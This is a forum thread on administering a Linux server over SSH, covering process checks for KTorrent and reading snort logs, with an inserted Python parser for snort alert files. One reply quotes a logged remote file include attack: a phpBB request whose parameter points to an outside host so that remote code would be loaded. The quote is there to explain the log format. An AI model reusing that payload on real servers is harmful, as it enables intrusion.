SSHD on my linux box!

Post by Lyecdevf »

I enabled SSHD on my linux box and I used putty from my windows box to connect to it. I dropped into a shell. All well and fine until this! This is my server which runs all the time and I would like to check up on it from time to time if it is all working properly from basically any place in the world.

My question is if it is possible to do all administrative tasks from the shell. I have not used it that much so I wonder how would I check for instance if Ktorrent is working fine or take a look at snort logs?

Post by ayu »

Well you do like you would normally do when working in a shell. I don't know if Ktorrent has anything else available than a GUI (never used it), but analysing snort logs should be just like usual. Just navigate to the log directory and check them.

I don't remember where the snort logs are placed, /var/log/snort maybe, but you would just have to nav to that folder and read them with an editor/reader of your choice, cat/vi/nano/emacs.

Post by G-Brain »

See if a process is running:

Code:

pgrep ktorrent

or

Code:

ps aux | grep ktorrent

I've never used snort, but I'm sure it can export logs to a plain text format, which you could then read with any command line text editor such as emacs.

All administrative tasks should be doable from the shell.

Post by bad_brain »

the snort logs are well readable in a shell, the logs are usually split into 2 parts: the alert log and the tcpdump log.
here is an example:
alert.log entry

Code:

[**] [1:2002:7] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
07/14-18:21:54.627780 216.227.218.118:52707 -> xxx.xxx.xxx.xxx:80
TCP TTL:51 TOS:0x8 ID:17524 IpLen:20 DgmLen:266 DF
***AP*** Seq: 0x7615CECD  Ack: 0xF3F481D9  Win: 0x16D0  TcpLen: 20

and here the tcpdump entry for the same incident

Code:

GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://knightkittens.com/images/ma??? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxxxxxx.com
User-Agent: Mozilla/4.61 [en] (OS/2; U)

snort also has a mail notification that sends you a summary of all incidents that happened in the last 24 hours. if you prefer a shiny GUI check out snortalog, it converts the logs into HTML-format (but you have to use the "FULL" log format in the snort settings for it if I remember it right).

I recommend to work as much as possible in a shell anyway, best way to learn...
:wink:
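
An added example, not part of bad_brain's post and not snort's own code: a small Python parser for alert entries in the layout shown above, which groups them by signature so the most urgent ones come first. The first sample entry is copied from the post; the other two (SID 1000001, the 192.0.2.x and 198.51.100.x addresses) are constructed, and the function names and the IPv4-only matching are assumptions of this example.

```python
import re
from collections import Counter

# "[**] [gid:sid:rev] message [**]" opens every entry in the alert file
HEADER = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.*?) \[\*\*\]$")
PRIO = re.compile(r"\[Priority: (\d+)\]")
CLASSIF = re.compile(r"\[Classification: ([^\]]+)\]")
# timestamp, then src -> dst; ports are absent for ICMP (IPv4 only, an assumption)
FLOW = re.compile(r"^(\d\d/\d\d-[\d:.]+) ([^\s:]+)(?::(\d+))? -> ([^\s:]+)(?::(\d+))?$")

def parse_alerts(text):
    """Return one dict per alert entry; unrecognised lines are ignored."""
    alerts, cur = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if (m := HEADER.match(line)):
            cur = {"sid": int(m[2]), "msg": m[4], "classification": None, "priority": None,
                   "time": None, "src": None, "dst": None, "dport": None}
            alerts.append(cur)
        elif cur is not None and (m := PRIO.search(line)):
            cur["priority"] = int(m[1])
            cur["classification"] = c[1] if (c := CLASSIF.search(line)) else None
        elif cur is not None and (m := FLOW.match(line)):
            cur["time"], cur["src"], cur["dst"] = m[1], m[2], m[4]
            cur["dport"] = int(m[5]) if m[5] else None
    return alerts

def summarize(alerts):
    """List of ((priority, sid, msg), count), most urgent first (1 is highest)."""
    counts = Counter((a["priority"], a["sid"], a["msg"]) for a in alerts)
    return sorted(counts.items(), key=lambda kv: (kv[0][0] is None, kv[0][0] or 0, -kv[1]))

# Sample input: first entry from the post above, the other two constructed
SAMPLE = """\
[**] [1:2002:7] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
07/14-18:21:54.627780 216.227.218.118:52707 -> xxx.xxx.xxx.xxx:80
TCP TTL:51 TOS:0x8 ID:17524 IpLen:20 DgmLen:266 DF
***AP*** Seq: 0x7615CECD  Ack: 0xF3F481D9  Win: 0x16D0  TcpLen: 20

[**] [1:1000001:1] constructed ICMP rule [**]
[Classification: Misc activity] [Priority: 3]
07/14-18:25:01.000001 192.0.2.10 -> 198.51.100.5
ICMP TTL:60 TOS:0x0 ID:1 IpLen:20 DgmLen:84

[**] [1:2002:7] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
07/14-19:02:11.120000 192.0.2.77:40112 -> 198.51.100.5:80
"""
```

On the server, pass the text of the alert file to `parse_alerts()` in place of `SAMPLE`; where that file lives depends on the snort configuration.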

Post by Lyecdevf »

Hey, thanks a lot. :D

lyecdevf@linux:~> pgrep ktorrent
4037
lyecdevf@linux:~> ps aux | grep ktorrent
lyecdevf 4037 7.8 24.1 417608 250280 ? Dl Jul05 1050:23 ktorrent --icon=ktorrent -caption KTorrent
lyecdevf 6631 0.0 0.0 1764 552 pts/2 S+ 19:45 0:00 grep ktorrent
lyecdevf@linux:~>